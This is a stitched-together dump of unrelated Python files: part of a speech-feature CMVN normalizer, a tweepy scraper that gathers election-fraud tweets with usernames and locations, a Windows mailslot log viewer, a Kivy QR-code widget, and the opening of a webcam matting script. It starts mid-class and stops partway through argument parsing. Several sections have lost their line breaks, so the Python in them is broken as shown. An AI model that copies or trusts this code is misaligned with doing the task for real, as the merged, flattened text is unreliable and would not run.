gStats[:-1][None,:] self.__counter = int(gStats[-1]) else: assert len(gStats.shape) == 2 self.__cmv = gStats[:,:-1] self.__counter = int(gStats[0,-1]) assert self.__counter > 0 self.__cmvn = self.__cmv / self.__counter self.__dim = self.__cmvn.shape[1] @property def dim(self): ''' Get the cmvn dim. ''' return self.__dim def apply(self,frames): ''' Apply CMVN to feature. If the dim of feature > the dim of cmvn, you can set offet to set cmvn range. ''' if len(frames) == 0: return frames # if did not set the offet if self.offset == -1: assert frames.shape[1] == self.dim, f"{self.name}: Feature dim dose not match CMVN dim, {frames.shape[1]} != {self.dim}. " return ((frames - self.__cmvn[0])/self.__cmvn[1]) if self.__std else (frames - self.__cmvn[0]) # if had offset else: endIndex = self.offset + self.dim assert endIndex <= frames.shape[1], f"{self.name}: cmvn dim range over flow, feature dim: {frames.shape[1]}, cmvn dim: {endIndex}." 
        # Tail of the previous CMVNormalizer subclass's apply() (its "def"
        # is above this chunk): normalize only the [offset:endIndex] feature
        # columns in place and return the full frame matrix.
        sliceFrames = frames[:,self.offset:endIndex]
        result = ((sliceFrames - self.__cmvn[0])/self.__cmvn[1]) if self.__std else (sliceFrames - self.__cmvn[0])
        frames[:,self.offset:endIndex] = result
        return frames

class FrameSlideCMVNormalizer(CMVNormalizer):
    '''
    Classic frame sliding CMVN.

    Keeps a ring buffer of the last <width> frames (and their squares when
    <std> is True) so mean (and variance) statistics can be updated online,
    one frame at a time.  Optionally seeded with frozen CMVN values or
    global statistics used to pad the window before it fills up.
    '''
    def __init__(self,width=600,std=False,freezedCmvn=None,gStats=None,offset=-1,dim=None,name=None):
        '''
        Args:
          _width_: (int) sliding-window length in frames.
          _std_: (bool) if True also track second-order stats for variance
                 normalization; otherwise mean subtraction only.
          _freezedCmvn_: (2-d np.ndarray) precomputed [mean; std] rows; when
                 given, apply() uses it directly and never updates.
          _gStats_: (2-d np.ndarray) global stats whose last column is the
                 frame count; used to back-fill an unfilled window.
          _offset_: (int) column offset of the feature inside wider frames,
                 or -1 to normalize the whole frame.
          _dim_: (int) feature dimension, if known up front.
          _name_: (str) component name.
        '''
        super().__init__(offset=offset,name=name)
        assert isinstance(width,int) and width > 0, f"{self.name}: <width> should be a reasonable value."
        assert isinstance(std,bool), f"{self.name}: <std> should be a bool value."
        self.__width = width
        self.__std = std
        self.__dim = None
        self.__freezedCmvn = None
        self.__globalCMV = None
        # If has freezed cmvn
        if freezedCmvn is not None:
            assert isinstance(freezedCmvn,np.ndarray) and len(freezedCmvn) == 2, \
                "<freezedCMVN> should be a 2-d NumPy array."
            self.__freezedCmvn = freezedCmvn
            self.__dim = freezedCmvn.shape[1]
        # If has global CMVN
        elif gStats is not None:
            assert isinstance(gStats,np.ndarray) and len(gStats) == 2, \
                "<globalCMV> should be a 2-d NumPy array."
            # Last column of gStats holds the accumulated frame count.
            self.__globalCMV = gStats[:,0:-1]
            self.__globalCounter = gStats[0,-1]
            self.__dim = gStats.shape[1] - 1
            # Row 0 accumulates sums; row 1 (std mode) accumulates squares.
            if self.__std:
                self.__frameBuffer = np.zeros([2,self.__width, self.__dim],dtype="float32")
                self.__cmv = np.zeros([2, self.__dim],dtype="float32")
            else:
                self.__frameBuffer = np.zeros([1,self.__width, self.__dim],dtype="float32")
                self.__cmv = np.zeros([1, self.__dim],dtype="float32")
        else:
            if dim is not None:
                assert isinstance(dim,int) and dim > 0
                self.__dim = dim
                if self.__std:
                    self.__frameBuffer = np.zeros([2,self.__width, self.__dim],dtype="float32")
                    self.__cmv = np.zeros([2, self.__dim],dtype="float32")
                else:
                    self.__frameBuffer = np.zeros([1,self.__width, self.__dim],dtype="float32")
                    self.__cmv = np.zeros([1, self.__dim],dtype="float32")
            else:
                # Dimension unknown: buffers are allocated lazily by
                # cache_frame() on the first frame.
                self.__cmv = None
                self.__frameBuffer = None
        # Other configs
        self.__counter = 0      # number of frames cached so far
        self.__ringIndex = 0    # next write position in the ring buffer

    @property
    def dim(self):
        # Feature dimension; only valid once known (ctor arg or first frame).
        assert self.__dim is not None
        return self.__dim

    def freeze(self):
        '''Freeze the CMVN statistics.'''
        if self.__freezedCmvn is None:
            self.__freezedCmvn = self.get_cmvn()

    def apply(self,frames):
        '''Apply the cmvn to frames.

        Args:
          _frames_: (2-d np.ndarray) a batch of feature frames, one per row.
        Returns:
          the normalized frames (modified in place when offset != -1).
        '''
        assert isinstance(frames,np.ndarray)
        if len(frames) == 0:
            return frames
        assert len(frames.shape) == 2
        fdim = frames.shape[1]
        if self.offset == -1:
            # Check the feature dimmension
            if self.__dim is not None:
                assert fdim == self.dim
            # If has freezed cmvn
            if self.__freezedCmvn is not None:
                return ((frames-self.__freezedCmvn[0])/self.__freezedCmvn[1]) if self.__std else (frames-self.__freezedCmvn[0])
            else:
                return self.__apply(frames)
        else:
            # Check the feature dimmension
            if self.__dim is not None:
                assert self.offset + self.__dim <= fdim
                endIndex = self.offset + self.__dim
            else:
                # First call: infer dimension from frame width and offset.
                self.__dim = fdim - self.offset
                endIndex = fdim
            # Compute
            sliceFrames = frames[ :, self.offset:endIndex ]
            result = self.__apply(sliceFrames)
            frames[ :, self.offset:endIndex ] = result
            return frames

    @property
    def counter(self):
        # Total frames cached since construction (not capped at width).
        return self.__counter

    @property
    def width(self):
        return self.__width

    def __apply(self,frames):
        # Online path: cache each frame, then normalize it with the stats
        # as of that frame (frames is mutated row by row).
        for ID in range(len(frames)):
            self.cache_frame(frames[ID])
            cmvn = self.get_cmvn()
            if self.__std:
                frames[ID] = (frames[ID]- cmvn[0])/cmvn[1]
            else:
                frames[ID] = (frames[ID]- cmvn[0])
        return frames

    def cache_frame(self,frame):
        '''Cache frame

        Push one frame into the ring buffer, updating the running sum
        (and sum of squares in std mode) incrementally.
        '''
        if self.__frameBuffer is None:
            # Lazy allocation on the first frame: dim was unknown until now.
            dim = len(frame)
            if self.__std:
                self.__frameBuffer = np.zeros([2,self.__width,dim],dtype="float32")
                self.__cmv = np.zeros([2,dim],dtype="float32")
                frame2 = frame ** 2
                self.__frameBuffer[0,0,:] = frame
                # NOTE(review): row 1 of the buffer is seeded with `frame`,
                # not `frame2`, although __cmv[1] gets frame2 — looks like a
                # typo; confirm against the update branch below.
                self.__frameBuffer[1,0,:] = frame
                self.__cmv[0,:] = frame
                self.__cmv[1,:] = frame2
            else:
                self.__frameBuffer = np.zeros([1,self.__width,dim],dtype="float32")
                self.__cmv = np.zeros([1,dim],dtype="float32")
                self.__frameBuffer[0,0,:] = frame
                self.__cmv[0,:] = frame
            self.__counter = 1
            self.__ringIndex = 1
            self.__dim = dim
        else:
            # Replace the oldest slot: subtract what falls out of the
            # window, add the new frame.
            self.__cmv[0] = self.__cmv[0] - self.__frameBuffer[0,self.__ringIndex,:] + frame
            self.__frameBuffer[0,self.__ringIndex,:] = frame
            if self.__std:
                frame2 = frame ** 2
                self.__cmv[1] = self.__cmv[1] - self.__frameBuffer[1,self.__ringIndex,:] + frame2
                self.__frameBuffer[1,self.__ringIndex,:] = frame2
            self.__ringIndex = (self.__ringIndex + 1)%self.__width
            self.__counter += 1

    def get_cmvn(self):
        '''Get the current statistics

        Returns mean (and std-row) estimates.  Before the window fills,
        global statistics (when available) pad the missing frames.
        '''
        if self.__counter >= self.__width:
            return self.__cmv/self.__width
        else:
            if self.__globalCMV is None:
                return self.__cmv/self.__counter
            else:
                missed = self.__width - self.__counter
                if self.__globalCounter >= missed:
                    return (self.__cmv + self.__globalCMV * missed/self.__globalCounter)/self.__width
                else:
                    return (self.__cmv + self.__globalCMV) / (self.__counter + self.__globalCounter)

    def set_stats(self,stats):
        # Restore accumulated stats; last column carries the frame count.
        assert isinstance(stats,np.ndarray) and len(stats.shape) == 2
        self.__cmv = stats[:,0:-1]
        self.__counter = stats[0,-1]

    def set_freezed_cmvn(self,cmvn):
        assert isinstance(cmvn,np.ndarray) and len(cmvn.shape) == 2
        self.__freezedCmvn = cmvn

    def get_stats(self):
        '''Write the statistics into file.'''
        num = self.__counter if self.__counter < self.__width else self.__width
        # NOTE(review): [[num,],[0]] is a 2-row column, but __cmv has only
        # one row when std=False, so this np.append would raise a shape
        # error in that mode — confirm get_stats is only used with std=True.
        return np.append(self.__cmv,[[num,],[0]],axis=1)

    def get_freezed_cmvn(self):
        '''Write the freezed cmvn into file.'''
        return self.__freezedCmvn

###############################################
# 3. Some functions for raw feature processing
###############################################

class MatrixFeatureProcessor(Component):
    '''
    The feature processor.

    Pipeline component that applies, in order: CMVN normalizers, context
    wrapping, delta features, frame splicing, and an optional LDA
    transform, then strips the context padding again.
    '''
    def __init__(self,delta=0,deltaWindow=2,spliceLeft=0,spliceRight=0,
                 cmvNormalizer=None,lda=None,oKey="data",name=None):
        '''
        Args:
          _delta_: (int) The order of delta.
          _deltaWindow_: (int) The window size of delta.
          _spliceLeft_: (int) Left context to splice.
          _spliceRight_: (int) Right context to splice.
          _cmvNormalizer_: (CMVNormalizer).
          _lda_: (str, 2-d array) LDA file path or 2-d np.ndarray.
          _name_: (str) Name.
        '''
        super().__init__(oKey=oKey,name=name)
        assert isinstance(delta,int) and delta >= 0
        assert isinstance(deltaWindow,int) and deltaWindow > 0
        assert isinstance(spliceLeft,int) and spliceLeft >= 0
        assert isinstance(spliceRight,int) and spliceRight >= 0
        self.__delta = delta
        self.__deltaWindow = deltaWindow
        self.__context = ContextManager(spliceLeft,spliceRight)
        # Config LDA
        if lda is not None:
            if isinstance(lda,str):
                self.__ldaMat = load_lda_matrix(lda)
            else:
                assert isinstance(lda,np.ndarray) and len(lda.shape) == 2
                self.__ldaMat = lda
        else:
            self.__ldaMat = None
        # Config CMVNs
        self.__cmvns = []
        if cmvNormalizer is not None:
            self.set_cmvn(cmvNormalizer)

    def set_cmvn(self,cmvn,index=-1):
        '''Append a CMVN normalizer, or replace the one at <index>.'''
        assert isinstance(cmvn,CMVNormalizer),f"{self.name}: <cmvNormalizer> mush be a CMVNormalizer object but got: {type(cmvn).__name__}."
        if index == -1:
            self.__cmvns.append( cmvn )
        else:
            assert isinstance(index,int) and 0 <= index < len(self.__cmvns)
            self.__cmvns[index] = cmvn

    def __transform_function(self,feats):
        ## do the cmvn firstly.
        ## We will save the new cmvn feature instead of raw feature buffer.
        if len(self.__cmvns) > 0:
            for cmvn in self.__cmvns:
                feats = cmvn.apply( feats )
        ## then compute context
        #print( "debug 1:", feats.shape )
        # wrap() may return None until enough context frames are buffered.
        feats = self.__context.wrap( feats )
        if feats is None:
            return None
        #print( "debug 2:", feats.shape )
        # Add delta
        if self.__delta > 0:
            feats = add_deltas(feats,order=self.__delta,window=self.__deltaWindow)
        # Splice
        if self.__context.left > 0 or self.__context.right != 0:
            feats = splice_feats(feats,left=self.__context.left,right=self.__context.right)
        # Use LDA transform
        if self.__ldaMat is not None:
            feats = feats.dot(self.__ldaMat)
        feats = self.__context.strip( feats )
        return feats

    def core_loop(self):
        '''Component main loop: pull packets, transform their matrices and
        forward them.  Because the context wrapper delays output by one
        packet, the previous packet is held in lastPacket and flushed when
        its result becomes available (or, at an endpoint, by pushing a
        zero matrix through to drain the context buffer).'''
        lastPacket = None
        while True:
            action = self.decide_action()
            if action is True:
                packet = self.get_packet()
                if not packet.is_empty():
                    iKey = packet.mainKey if self.iKey is None else self.iKey
                    newMat = self.__transform_function( packet[iKey] )
                    if newMat is None:
                        # Context not yet satisfied: hold this packet.
                        lastPacket = packet
                    else:
                        if lastPacket is None:
                            packet.add( self.oKey[0], newMat, asMainKey=True )
                            self.put_packet( packet )
                        else:
                            # Result belongs to the held packet; the fresh
                            # packet becomes the new held one.
                            lastPacket.add( self.oKey[0], newMat, asMainKey=True )
                            self.put_packet( lastPacket )
                            lastPacket = packet
                if is_endpoint(packet):
                    if lastPacket is not None:
                        # Drain the context buffer with a zero matrix so the
                        # held packet can be completed and emitted.
                        iKey = lastPacket.mainKey if self.iKey is None else self.iKey
                        newMat = self.__transform_function( np.zeros_like(lastPacket[iKey]) )
                        lastPacket.add( self.oKey[0], newMat, asMainKey=True )
                        self.put_packet( lastPacket )
                    if packet.is_empty():
                        # Forward the bare endpoint marker itself.
                        self.put_packet( packet )
            else:
                break
# ==== twitter_playground.py ====
"""Collect tweets with tweepy worker processes and post-process them into a
CSV, a sentiment label helper and a word cloud.

NOTE(review): the API credential constants below are empty and must be
filled in before running; `api` is built at import time.
"""
import json
import re
from pprint import pprint
import os
import pandas
import tweepy as tw
import pandas as pd
from multiprocessing import Pool, Process, Lock, Queue
import time
import csv
# BUG FIX: the original ended its import block with `from queue import
# Queue`, which shadowed multiprocessing.Queue — queue.Queue instances are
# NOT shared across Process workers, so the collect/process pipeline could
# never exchange data.  The module is kept importable under an alias.
from queue import Queue as ThreadQueue

CONSUMER_KEY = ""
CONSUMER_SECRET = ""
ACCESS_TOKEN = ""
ACCESS_TOKEN_SECRET = ""
OUTPUT = 'tweet_threads.csv'

auth = tw.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tw.API(auth, wait_on_rate_limit=True)

search_words = "election+fraud -filter:retweets"
new_q = "mail+in+ballots"
date_since = "2020-11-05"
new_search = new_q + " -filter:retweets"
fraud_search = "voter+fraud -filter:retweets"


def rem_hashtags(text, hashtag=None):
    """Remove hashtags from *text*.

    Args:
        text: tweet text.
        hashtag: a specific tag (without '#') to strip; when None (the
            default) every '#word' token is removed.

    The default was added because clean_up_tweets() calls this with a
    single argument, which previously raised TypeError.
    """
    if hashtag is None:
        processed_text = re.sub(r"#\w+", "", text)
    else:
        processed_text = re.sub(r"#{ht}".format(ht=hashtag), "", text)
    processed_text = " ".join(processed_text.split())
    return processed_text


def remove_users(text):
    """Strip @mentions from *text* and collapse whitespace."""
    processed_text = re.sub(r'@\w+ ?', "", text)
    processed_text = " ".join(processed_text.split())
    return processed_text


def remove_links(text):
    """Strip URLs (and stray @...) from *text* and collapse whitespace."""
    processed_text = re.sub(r"(?:\@|http?\://|https?\://|www)\S+", "", text)
    processed_text = " ".join(processed_text.split())
    return processed_text


def remove_punct(text):
    """Remove ASCII punctuation and digits from *text*."""
    punctuations = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
    text = "".join([char for char in text if char not in punctuations])
    text = re.sub('[0-9]+', '', text)
    return text


def lowercase_word(text):
    """Lowercase *text* (equivalent to the original per-char join)."""
    return text.lower()


def clean_up_tweets(csv_file):
    """Read the tweets CSV and return all tweet texts cleaned and joined
    into one space-separated string (suitable for a word cloud)."""
    data = pd.read_csv(csv_file, header=None, encoding='utf-8',
                       names=['Time', 'Tweets', 'Userame', 'Location'])
    data['Tweets'] = data['Tweets'].apply(rem_hashtags)
    data['Tweets'] = data['Tweets'].apply(remove_users)
    data['Tweets'] = data['Tweets'].apply(remove_links)
    data['Tweets'] = data['Tweets'].apply(remove_punct)
    data['Tweets'] = data['Tweets'].apply(lowercase_word)
    return " ".join(iter(data['Tweets']))


def get_tweet_sentiment(data):
    '''
    Map a numeric sentiment polarity to a label.

    Args:
        data: a polarity score (e.g. TextBlob's sentiment.polarity).
    Returns:
        'positive', 'neutral' or 'negative'.

    The original version also contained TextBlob/DataFrame analysis code
    after these return statements; it was unreachable (and referenced the
    never-imported TextBlob), so it has been removed.
    '''
    if data > 0:
        return 'positive'
    elif data == 0:
        return 'neutral'
    else:
        return 'negative'


def make_wordcloud(data):
    '''
    input: cleaned tweet data ex. clean_up_tweets(csvfile)
    output: image file of wordcloud

    Create a wordcloud based on the input tweets.

    matplotlib and wordcloud are imported lazily here because the original
    referenced `plt` and `WordCloud` without importing them anywhere,
    which raised NameError at call time.
    '''
    import matplotlib.pyplot as plt
    from wordcloud import WordCloud

    fig, ax = plt.subplots(1, 1, figsize=(30, 30))
    # Create and generate a word cloud image:
    wordcloud_ALL = WordCloud(max_font_size=50, max_words=100,
                              background_color="white").generate(data)
    # Display the generated image:
    ax.imshow(wordcloud_ALL, interpolation='bilinear')
    ax.axis('off')


class Twittermine(object):
    """Multiprocess tweet collector/processor that appends rows to a CSV."""

    def __init__(self, output=OUTPUT):
        super(Twittermine, self).__init__()
        self.queue = Queue()        # multiprocessing.Queue shared with workers
        self.output = output
        self.uid = 0
        self.print_lock = Lock()
        self.write_lock = Lock()
        self.uid_lock = Lock()
        self.process_pool = []
        self.collect_pool = []
        self.found_ = Queue()       # failed queries, re-queued for retry
        self.queries = Queue()      # (search_word, item_count) work items
        # NOTE(review): nothing in this module ever puts items on
        # self.queries, so collect_tweets() exits immediately — confirm the
        # intended seeding of queries before running.

    def fetch_tweets(self, query, item_count=100):
        """Return an iterator of up to *item_count* tweets for *query*.

        NOTE(review): `api.search` was renamed `api.search_tweets` in
        tweepy 4.x — confirm the pinned tweepy version.
        """
        return tw.Cursor(api.search, q=query, lang="en",
                         since=date_since).items(item_count)

    def fetch_user_loc(self, query, item_count=100):
        """Return [[screen_name, location], ...] for tweets matching *query*."""
        tweets = tw.Cursor(api.search, q=query, lang="en",
                           since=date_since).items(item_count)
        return [[tweet.user.screen_name, tweet.user.location] for tweet in tweets]

    def make_tweet_pandas(self, tweet_data: list, cols: list):
        """Wrap collected rows in a DataFrame with the given column names."""
        return pd.DataFrame(data=tweet_data, columns=cols)

    def run(self, collect_threads=3, process_threads=3):
        '''
        Starts threads to collect tweets and threads to read them.
        '''
        print('Starting collection...')
        self.manage_collect(collect_threads)
        time.sleep(120)
        print('Starting processing...')
        self.manage_process(process_threads)
        for p in self.collect_pool:
            p.join()
        if not self.queue.empty():
            # If there's still articles to process, restart processing
            self.manage_process(process_threads)
        for p in self.process_pool:
            p.join()

    def manage_process(self, process_threads):
        '''
        Start given number of threads to multi-process tweets.

        BUG FIX: the original wrapped the spawn block in
        `while not self.queue.empty()`, starting *process_threads* NEW
        processes on every iteration — an unbounded spawn loop.  Workers
        are now started once and drain the queue themselves.
        '''
        if self.queue.empty():
            self.print_lock.acquire()
            print('No tweets found. Ending processing.')
            self.print_lock.release()
            return
        for _ in range(process_threads):
            p = Process(target=self.process_tweets, args=())
            p.start()
            self.process_pool.append(p)

    def manage_collect(self, collect_threads):
        '''
        Start a given number of threads to multi-process collection.
        '''
        for _ in range(collect_threads):
            p = Process(target=self.collect_tweets, args=())
            p.start()
            self.collect_pool.append(p)

    def collect_tweets(self):
        '''
        Collects tweets from sites, downloads, and adds them to queue for
        processing.  Failed queries are parked on self.found_ for retry.
        '''
        while not self.queries.empty():
            search_word, items = self.queries.get()
            tweets = self.fetch_tweets(search_word, item_count=items)
            if not tweets:
                self.found_.put((search_word, items))
                self.print_lock.acquire()
                print('Error collecting tweets; moving to back of queue.')
                self.print_lock.release()
            else:
                self.queue.put(tweets)

    def process_tweets(self):
        '''
        Processes articles in queue.  Loops until the queue is drained
        (workers are started once by manage_process()).
        '''
        while not self.queue.empty():
            tweetlist = self.queue.get()
            print("Tweets successfully found in queue!")
            try:
                row = self.read_tweets(tweetlist)
                self.write_to_file(row, self.output)
                info = clean_up_tweets(self.output)
                make_wordcloud(info)
            except Exception as e:
                print('Error downloading or reading tweet.')
                print(e)

    def write_to_file(self, row, output, method='a'):
        '''
        Writes result to file, creating the header row first when the file
        does not exist yet.  Accepts either one row or a list of rows.
        '''
        if not os.path.isfile(output) and method == 'a':
            self.write_to_file(['Time', 'Tweets', 'Userame', 'Location'], output, 'w')
        self.write_lock.acquire()
        try:
            # newline='' prevents csv from emitting blank lines on Windows.
            with open(output, method, newline='') as f:
                writer = csv.writer(f)
                if row and isinstance(row[0], (list, tuple)):
                    # BUG FIX: read_tweets() returns a list of rows; the
                    # original wrote it with writerow(), flattening all
                    # tweets into one malformed CSV row.
                    writer.writerows(row)
                else:
                    writer.writerow(row)
        finally:
            self.write_lock.release()

    def get_uid(self):
        '''
        Gets a uid for the tweet.
        '''
        self.uid_lock.acquire()
        uid = self.uid
        self.uid += 1
        self.uid_lock.release()
        return uid

    def read_tweets(self, tweets):
        '''
        Parses tweets. Returns rows of information for csv ingestion.
        '''
        print(f"Outputting tweets for search thread")
        return [[tweet.created_at, tweet.text, tweet.user.screen_name,
                 tweet.user.location] for tweet in tweets]

    def output_data_as_df(self, all_data):
        """Return the collected rows as a DataFrame."""
        return self.make_tweet_pandas(
            all_data, cols=['Time', 'Tweets', 'Userame', 'Location']
        )


if __name__ == '__main__':
    # BUG FIX: the original ran `print(tweeter.run())` unconditionally at
    # import time (run() returns None); guard the entry point instead.
    tweeter = Twittermine()
    tweeter.run()
# ==== mailslot_listener.pyw ====
# -*- coding: utf-8 -*-
# BUG FIX: the coding cookie above was missing its leading '#', which made
# the entire file a SyntaxError before anything else could run.
"""Listen on a Windows mailslot and display arriving text in a window.

Messages are marshal-encoded strings; a marshalled None tells the listener
thread to close the window and exit.
"""
import os, sys
import marshal
import threading
import time

import pywintypes
import winerror
import win32gui
import win32con
import win32api

from winsys import core, exceptions, ipc, utils, dialogs

# Map Win32 error codes onto winsys exceptions for wrapped() calls.
WINERROR_MAP = {
    winerror.ERROR_INVALID_WINDOW_HANDLE : exceptions.x_invalid_handle,
}
wrapped = exceptions.wrapper(WINERROR_MAP)


class MainWindow:
    """Top-level window holding one read-only, multiline EDIT control that
    accumulates log output."""

    def __init__(self, title):
        wc = win32gui.WNDCLASS()
        hinst = wc.hInstance = win32api.GetModuleHandle(None)
        wc.lpszClassName = "Log output window"
        wc.lpfnWndProc = self._wndproc_
        wc.hbrBackground = win32con.COLOR_WINDOW
        wc.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)
        wc.style = win32con.CS_OWNDC | win32con.CS_HREDRAW | win32con.CS_VREDRAW
        self.hEdit = None
        self.hwnd = win32gui.CreateWindowEx(
            win32con.WS_EX_CLIENTEDGE | win32con.WS_EX_APPWINDOW,
            win32gui.RegisterClass(wc),
            title,
            win32con.WS_OVERLAPPEDWINDOW,
            0, 0, win32con.CW_USEDEFAULT, win32con.CW_USEDEFAULT,
            0, 0, hinst, None
        )
        # Child EDIT fills the client area; it is resized on WM_SIZE.
        self.hEdit = win32gui.CreateWindow(
            "EDIT", None,
            win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_VSCROLL |
            win32con.ES_LEFT | win32con.ES_MULTILINE | win32con.ES_AUTOVSCROLL,
            0, 0, 0, 0,
            self.hwnd, 0, hinst, None
        )
        win32gui.ShowWindow(self.hwnd, win32con.SW_SHOWNORMAL)

    def _wndproc_(self, hwnd, msg, wparam, lparam):
        """Window procedure: resize the edit control, quit on destroy, and
        treat WM_SETTEXT as 'append this text' (sent by the mailslot
        thread)."""
        if msg == win32con.WM_SIZE:
            win32gui.MoveWindow(self.hEdit, 0, 0,
                                win32api.LOWORD(lparam),
                                win32api.HIWORD(lparam), True)
        elif msg == win32con.WM_DESTROY:
            win32gui.PostQuitMessage(0)
        elif msg == win32con.WM_SETTEXT:
            self.output_message(win32gui.PyGetString(lparam))
        else:
            return win32gui.DefWindowProc(hwnd, msg, wparam, lparam)

    def output_message(self, string):
        """Append *string* to the edit control and scroll to the bottom,
        suppressing redraw while updating."""
        # EDIT controls want CRLF; normalize whatever arrived.
        string = string.replace("\r\n", "\n").replace("\n", "\r\n")
        hwnd = self.hEdit
        win32gui.SendMessage(hwnd, win32con.EM_SETREADONLY, 0, 0)
        win32gui.SendMessage(hwnd, win32con.WM_SETREDRAW, 0, 0)
        win32gui.SendMessage(hwnd, win32con.EM_REPLACESEL, 0,
                             utils.string_as_pointer(string))
        win32gui.SendMessage(hwnd, win32con.EM_LINESCROLL, 0,
                             win32gui.SendMessage(hwnd, win32con.EM_GETLINECOUNT, 0, 0))
        win32gui.SendMessage(hwnd, win32con.WM_SETREDRAW, 1, 0)
        win32gui.SendMessage(hwnd, win32con.EM_SETREADONLY, 1, 0)


def handle_mailslot(hwnd, mailslot_name):
    """Background thread: read marshalled strings from the mailslot and
    forward them to the window; None means shut the window and stop."""
    # NOTE(review): this uses ipc.mailslot(...) while main() below uses
    # ipc.Mailslot(...) — confirm both names exist in the winsys version in
    # use; left as-is because winsys exposes factory functions alongside
    # classes.
    mailslot = ipc.mailslot(mailslot_name)
    while True:
        text = marshal.loads(mailslot.get())
        if text is None:
            try:
                # The window may already be gone; ignore a stale handle.
                wrapped(win32gui.PostMessage, hwnd, win32con.WM_CLOSE, 0, 0)
            except exceptions.x_invalid_handle:
                pass
            break
        else:
            win32gui.SendMessage(hwnd, win32con.WM_SETTEXT, 0,
                                 utils.string_as_pointer(text + "\n"))


def main(mailslot_name):
    """Create the window, start the mailslot reader thread and pump
    messages; on exit, poke the mailslot with None so the reader thread
    unblocks and terminates."""
    window = MainWindow("Listening to mailslot %s" % mailslot_name)
    threading.Thread(target=handle_mailslot,
                     args=(window.hwnd, mailslot_name)).start()
    win32gui.PumpMessages()
    try:
        ipc.Mailslot(mailslot_name).put(marshal.dumps(None))
    except exceptions.x_not_found:
        pass


if __name__ == '__main__':
    if len(sys.argv) >= 2:
        mailslot_name = sys.argv[1]
    else:
        results = dialogs.dialog("Mailslot name",
                                 ("Mailslot name", "\\\\.\\mailslot\\", None))
        if results:
            mailslot_name = results[0]
        else:
            sys.exit()
    main(mailslot_name)
# ==== qrcode_widget.py ====
""" Kivy Widget that accepts data and displays qrcode. """ import os from functools import partial from threading import Thread import qrcode from kivy.clock import Clock from kivy.graphics.texture import Texture from kivy.lang import Builder from kivy.properties import (BooleanProperty, ListProperty, NumericProperty, StringProperty) from kivy.uix.floatlayout import FloatLayout class QRCodeWidget(FloatLayout): show_border = BooleanProperty(True) """Whether to show border around the widget. :data:`show_border` is a :class:`~kivy.properties.BooleanProperty`, defaulting to `True`. """ data = StringProperty(None, allow_none=True) """Data using which the qrcode is generated. :data:`data` is a :class:`~kivy.properties.StringProperty`, defaulting to `None`. """ error_correction = NumericProperty(qrcode.constants.ERROR_CORRECT_L) """The error correction level for the qrcode. :data:`error_correction` is a constant in :module:`~qrcode.constants`, defaulting to `qrcode.constants.ERROR_CORRECT_L`. """ background_color = ListProperty((1, 1, 1, 1)) """Background color of the background of the widget to be displayed behind the qrcode. :data:`background_color` is a :class:`~kivy.properties.ListProperty`, defaulting to `(1, 1, 1, 1)`. """ loading_image = StringProperty('data/images/image-loading.gif') """Intermediate image to be displayed while the widget ios being loaded. :data:`loading_image` is a :class:`~kivy.properties.StringProperty`, defaulting to `'data/images/image-loading.gif'`. 
""" def __init__(self, **kwargs): module_dir = os.path.dirname(os.path.abspath(__file__)) Builder.load_file(os.path.join(module_dir, "qrcode_widget.kv")) super().__init__(**kwargs) self.addr = None self.qr = None self._qrtexture = None def on_data(self, instance, value): if not (self.canvas or value): return img = self.ids.get('qrimage', None) if not img: # if texture hasn't yet been created delay the texture updating Clock.schedule_once(lambda dt: self.on_data(instance, value)) return img.anim_delay = .25 img.source = self.loading_image Thread(target=partial(self.generate_qr, value)).start() def on_error_correction(self, instance, value): self.update_qr() def generate_qr(self, value): self.set_addr(value) self.update_qr() def set_addr(self, addr): if self.addr == addr: return MinSize = 210 if len(addr) < 128 else 500 self.setMinimumSize((MinSize, MinSize)) self.addr = addr self.qr = None def update_qr(self): if not self.addr and self.qr: return QRCode = qrcode.QRCode addr = self.addr try: self.qr = qr = QRCode( version=None, error_correction=self.error_correction, box_size=10, border=0, ) qr.add_data(addr) qr.make(fit=True) except Exception as e: print(e) self.qr = None self.update_texture() def setMinimumSize(self, size): # currently unused, do we need this? 
self._texture_size = size def _create_texture(self, k, dt): self._qrtexture = texture = Texture.create(size=(k, k), colorfmt='rgb') # don't interpolate texture texture.min_filter = 'nearest' texture.mag_filter = 'nearest' def update_texture(self): if not self.addr: return matrix = self.qr.get_matrix() k = len(matrix) # create the texture in main UI thread otherwise # this will lead to memory corruption Clock.schedule_once(partial(self._create_texture, k), -1) cr, cg, cb, ca = self.background_color[:] cr, cg, cb = int(cr*255), int(cg*255), int(cb*255) # used bytearray for python 3.5 eliminates need for btext buff = bytearray() for r in range(k): for c in range(k): buff.extend([0, 0, 0] if matrix[r][c] else [cr, cg, cb]) # then blit the buffer # join not necessary when using a byte array # buff =''.join(map(chr, buff)) # update texture in UI thread. Clock.schedule_once(lambda dt: self._upd_texture(buff)) def _upd_texture(self, buff): texture = self._qrtexture if not texture: # if texture hasn't yet been created delay the texture updating Clock.schedule_once(lambda dt: self._upd_texture(buff)) return texture.blit_buffer(buff, colorfmt='rgb', bufferfmt='ubyte') texture.flip_vertical() img = self.ids.qrimage img.anim_delay = -1 img.texture = texture img.canvas.ask_update() if __name__ == '__main__': import sys from kivy.app import runTouchApp data = str(sys.argv[1:]) runTouchApp(QRCodeWidget(data=data))
# ==== inference_webcam.py ====
""" Inference on webcams: Use a model on webcam input. Once launched, the script is in background collection mode. Press B to toggle between background capture mode and matting mode. The frame shown when B is pressed is used as background for matting. Press Q to exit. Example: python inference_webcam.py \ --model-type mattingrefine \ --model-backbone resnet50 \ --backend pytorch \ --model-checkpoint "PATH_TO_CHECKPOINT" \ --resolution 1280 720 \ --video_device_id 0 \ """ import argparse, os, shutil, time import cv2 import torch from torch import nn from torch.utils.data import DataLoader from torchvision.transforms import Compose, ToTensor, Resize from torchvision.transforms.functional import to_pil_image from threading import Thread, Lock from tqdm import tqdm from PIL import Image from dataset import VideoDataset from model import MattingBase, MattingRefine from torchvision.transforms.functional import to_tensor # --------------- Arguments --------------- parser = argparse.ArgumentParser(description='Inference from web-cam') parser.add_argument('--model-type', type=str, required=True, choices=['mattingbase', 'mattingrefine']) parser.add_argument('--model-backbone', type=str, required=True, choices=['resnet101', 'resnet50', 'mobilenetv2']) parser.add_argument('--model-backbone-scale', type=float, default=0.25) parser.add_argument('--model-checkpoint', type=str, required=True) parser.add_argument('--model-refine-mode', type=str, default='sampling', choices=['full', 'sampling', 'thresholding']) 